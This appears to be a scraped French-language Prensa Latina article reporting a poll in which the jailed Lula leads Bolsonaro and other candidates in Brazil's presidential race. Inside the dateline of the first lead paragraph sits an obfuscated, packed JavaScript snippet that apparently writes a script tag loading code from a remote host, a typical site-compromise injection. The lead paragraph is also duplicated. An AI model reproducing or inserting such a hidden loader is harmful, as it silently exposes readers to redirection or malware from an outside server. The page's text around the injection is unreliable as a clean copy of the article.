jeudi 18 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Lula continue en tête des intentions de vote pour les élections présidentielles du Brésil

Brasilia, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ihysr|var|u0026u|referrer|yhbty||js|php'.split('|'),0,{})) 3 mai (Prensa Latina) À presqu'un mois de son incarcération, l'ex-président du Brésil, Luis Inacio Lula da Silva continue à caracoler en tête des intentions de vote pour la confrontation présidentielle d'octobre prochain.

Brasilia, 3 mai (Prensa Latina) À presqu’un mois de son incarcération, l’ex-président du Brésil, Luis Inacio Lula da Silva continue à caracoler en tête des intentions de vote pour la confrontation présidentielle d’octobre prochain.

Si Lula  pouvait se présenter comme candidat pour le Parti des Travailleurs (PT), il obtiendrait  27,6 pour cent des votes contre 19,5 pour son possible rival de l’extrême droite, JairBolsonaro, du Parti Social Libéral (PSL), selon un sondage réalisé par l’Institut ParanaPesquisas publiés ce jeudi.

Derrière Lula et Bolsonaro viennent l’ex-ministre du Tribunal Fédéral Suprême, Joaquim Barbosa du Parti Socialiste Brésilien, avec 9,2 pour cent des intentions de vote; et Marina Silva Red, qui a déjà été candidate aux présidentielles, avec 7,7 pour cent.

Selon ce sondage, effectué entre le 27 avril et le 2 mai, sur deux mille deux électeurs provenant de 26 états et du District Fédéral, 32,7 pour cent des électeurs croient que le leader historique du PT sera présent aux prochaines élections et le même pourcentage d’électeurs pensent qu’il ne parviendra pas à enregistrer sa candidature.

61,2 pour cent des personnes interrogées ont déclaré qu’elles ne voteraient pas pour un candidat soutenu par Lula; 23,4 pour cent ont indiqué qu’elles le feraient et 14,1 pour cent ont affirmé que cela dépendrait du candidat choisi, a précisé  le quotidien digital Brasil 247 dans sa publication du sondage.

peo/mgt/mpm

EN CONTINU
notes connexes